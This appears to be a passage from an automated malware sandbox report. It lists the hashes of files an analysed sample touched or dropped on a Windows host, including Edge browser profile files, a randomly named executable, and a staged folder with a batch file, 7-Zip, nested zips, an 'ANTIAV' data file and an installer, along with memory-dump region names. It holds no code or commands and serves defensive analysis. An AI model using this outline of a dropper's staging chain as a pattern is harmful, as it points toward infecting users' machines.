| SHA256 | df516249b46ea672cb587f193892108e193e812ad86c31363df4a4890e480882 |
| SHA512 | f6da410800bc96508a5aa53e3af7aa3949143ff0843c187e1296f6dafa9e0e32d8d937181d3d0955885305d9f0c5fb66f8df69ba43e6e041c34a4000315d94fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026
| MD5 | 6b04ab52540bdc8a646d6e42255a6c4b |
| SHA1 | 4cdfc59b5b62dafa3b20d23a165716b5218aa646 |
| SHA256 | 33353d2328ea91f6abf5fb5c5f3899853dcc724a993b9086cab92d880da99f4d |
| SHA512 | 4f3b417c77c65936486388b618a7c047c84fb2e2dd8a470f7fe4ffec1ad6699d02fa9c1bbd551414eef0f2e6747a9ee59ca87198b20f9f4a9a01394ae69fa730 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025
| MD5 | c03ff64e7985603de96e7f84ec7dd438 |
| SHA1 | dfc067c6cb07b81281561fdfe995aca09c18d0e9 |
| SHA256 | 0db8e9f0a185bd5dd2ec4259db0a0e89363afa953069f5238a0537671de6f526 |
| SHA512 | bb0fd94c5a8944a99f792f336bb8a840f23f6f0f1cb9661b156511a9984f0bb6c96baf05b7c1cf0efb83f43a224ecea52740432e3cfc85e0799428765eefb692 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2d952c85a1984e048c3e3985fb76d91f |
| SHA1 | 212aa3776ddfe5b1148b041756d9921b48d83cf0 |
| SHA256 | 519795fd673fca8fe2e8fb8f0edc3294a3ebcc1a29d012420d040c102cb67190 |
| SHA512 | 349a0a3f31210019f572b26e13b29f105380d63d1838ea831fde3972001ecbd25431e97e7c1187cb6332f4f3a45bc4bf8e6ec038ad3cd8994f78ab3acdf8b73f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | a49bdd6f3fa17df3e15c6a610c551a2b |
| SHA1 | 0281c747de4b1c911b09cbf41f2846e6100fa5a2 |
| SHA256 | 84ddba9584e1ae5091af5e32350f3bac88c0a5a404edd7c8cb89ffe8e85f1849 |
| SHA512 | 6a63e24bb0d62b1a13e3b65cc639d97c7c4f490a62e5328a17685f3b634ebc8dd27f47de51318656cefc103b6a09ef91e9152c3179435efbec75085ee130ab14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3c31d485121d02c93d69a660c9ae84a9 |
| SHA1 | 0195e08709d511651d58da568505fd846201ad46 |
| SHA256 | a9fde31918aa4759ccc17721f581683b5b8ad166d6187c8432b7cca9b48369f3 |
| SHA512 | ec24ed8d0207eb8b25aa77a0785a07a710c5caa8ca64206677d076a1aa955144ad465e3ab3a44523b6fec8ba1ec1e32ad77750b548489e6ca6dca580ac50cb8c |
memory/5028-650-0x0000000000400000-0x0000000000458000-memory.dmp
memory/5028-651-0x0000000000400000-0x0000000000458000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 7ba655be0f090527afaac6e752f09d72 |
| SHA1 | 95b83420f5f95c804d683a723c05b3ed07e08001 |
| SHA256 | e0d21d546ab6c03811d9e65666a3740924b64fef13536f42f9eb06c25db599b3 |
| SHA512 | 5d0c983f11d801406b65d04fe373dae0597e11b5b56583335cb671602906821f7e5f95abc30b877f86a34484d6aad949f6bdfd9ee2d65f9066bc63db48b66e82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 9aaa1e4144563f71ecc962c0f1b1ae71 |
| SHA1 | bac887f28389e5106a88b7cbf88d30622c565241 |
| SHA256 | b95ee46666bdd6d18f49f10e527d715015552f8b2548b8b4323b7e6fb459e9b8 |
| SHA512 | 0c5d0fcaa42a56a2085e5634ab7cd3b18ddd2842915926a092f106e11c10f18521354ace94c0465e15cbaa286e12ea1eb3ceca7b9b6d58e86db637709f191320 |
C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe
| MD5 | b2e6a3d0bf3320b759c464ae6fa5b735 |
| SHA1 | cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1 |
| SHA256 | 771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3 |
| SHA512 | bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a |
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 893874465a8d9f68f0684fd61e9f1d3c |
| SHA1 | 866a58255ebab05d4ee2f2ed8383a6555ac1df03 |
| SHA256 | e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0 |
| SHA512 | 1cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7 |
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 716459a6ceac7d310d4227ea3e9ddb59 |
| SHA1 | fa27addf18c197bf5fc054bfb5ae57de1caf3382 |
| SHA256 | ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1 |
| SHA512 | 3857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1 |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | a62944686498212b290eae637729a151 |
| SHA1 | 2053660850d3f578f7b31e5ced16069d6f9c4ee0 |
| SHA256 | 0bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e |
| SHA512 | ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | 870a5535c79edcf782551514f48d89ab |
| SHA1 | 333d814d65753cdc4c4e8fb587c09af6960110d1 |
| SHA256 | 814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d |
| SHA512 | f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 6f7f4f7ed739e3ac5eee8d0876ff76d4 |
| SHA1 | 9a65d52885624dc47f342b5a9875d7720540c755 |
| SHA256 | b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc |
| SHA512 | 35cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
| MD5 | 4a5f569872c858ede1c0c67500cfdd6d |
| SHA1 | cdcac69d89b45a7903198467c2d2d32126c31661 |
| SHA256 | 88b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc |
| SHA512 | d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
| MD5 | 6dd7f70cddc4310e047032d70550f72c |
| SHA1 | e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562 |
| SHA256 | e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d |
| SHA512 | 1e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c |
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
| MD5 | 4265bf9f9535ebb4e1830e2a50589285 |
| SHA1 | ddc45fe277a3b39179dd9e39e17d71b50a184607 |
| SHA256 | c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403 |
| SHA512 | 3a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
| MD5 | 18f4fe969c4ba0517b403e28f7ad2b72 |
| SHA1 | 9df09751ee1246db2ed6b6ed6fec87fb0891e077 |
| SHA256 | 06d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4 |
| SHA512 | 9847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4 |
memory/5576-731-0x00000000002F0000-0x00000000002FC000-memory.dmp
memory/5576-732-0x00000000052D0000-0x0000000005874000-memory.dmp
memory/5576-733-0x0000000004D20000-0x0000000004DB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
| MD5 | a915fd2a4e2750ee9003e628294bf284 |
| SHA1 | f9adc1e65fc3d2cf39b2c5a89030f3225e21616d |
| SHA256 | 5e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285 |
| SHA512 | 044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f |
memory/5576-735-0x0000000004F30000-0x0000000004F96000-memory.dmp
memory/5576-734-0x0000000004CF0000-0x0000000004CFA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 15c68ff60720faa1697d2e2df402d304 |
| SHA1 | 9314845fc65479ce73776d3525a08ed4f4e7187a |
| SHA256 | 028dec1e4aab5277c3bce6c52d102688ec3082e427f65517f567efce8a8037c5 |
| SHA512 | d23032e68e9a20bfae2891f76f3fb95b40d3ea80a2a30ecd480c376ce27a40f68cd436ad4a6f8662de67c6518448f5ffd75bc41b2c1135acb96d1fa3f9c2fcc8 |
memory/5768-754-0x0000000005280000-0x00000000052B6000-memory.dmp
memory/5768-755-0x00000000059D0000-0x0000000005FF8000-memory.dmp
memory/5768-756-0x0000000005950000-0x0000000005972000-memory.dmp
memory/5768-757-0x0000000006160000-0x00000000061C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o1isdzps.a04.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5768-763-0x0000000006240000-0x0000000006594000-memory.dmp
memory/5768-768-0x0000000006820000-0x000000000683E000-memory.dmp
memory/5768-769-0x0000000006D10000-0x0000000006D5C000-memory.dmp
memory/5768-773-0x00000000079F0000-0x0000000007A22000-memory.dmp
memory/5768-774-0x000000006F550000-0x000000006F59C000-memory.dmp
memory/5768-784-0x0000000006DF0000-0x0000000006E0E000-memory.dmp
memory/5768-785-0x0000000007A30000-0x0000000007AD3000-memory.dmp
memory/5768-787-0x0000000008190000-0x000000000880A000-memory.dmp
memory/5768-788-0x0000000007B40000-0x0000000007B5A000-memory.dmp
memory/5768-789-0x0000000007BC0000-0x0000000007BCA000-memory.dmp
memory/5768-790-0x0000000007DC0000-0x0000000007E56000-memory.dmp
memory/5768-791-0x0000000007D40000-0x0000000007D51000-memory.dmp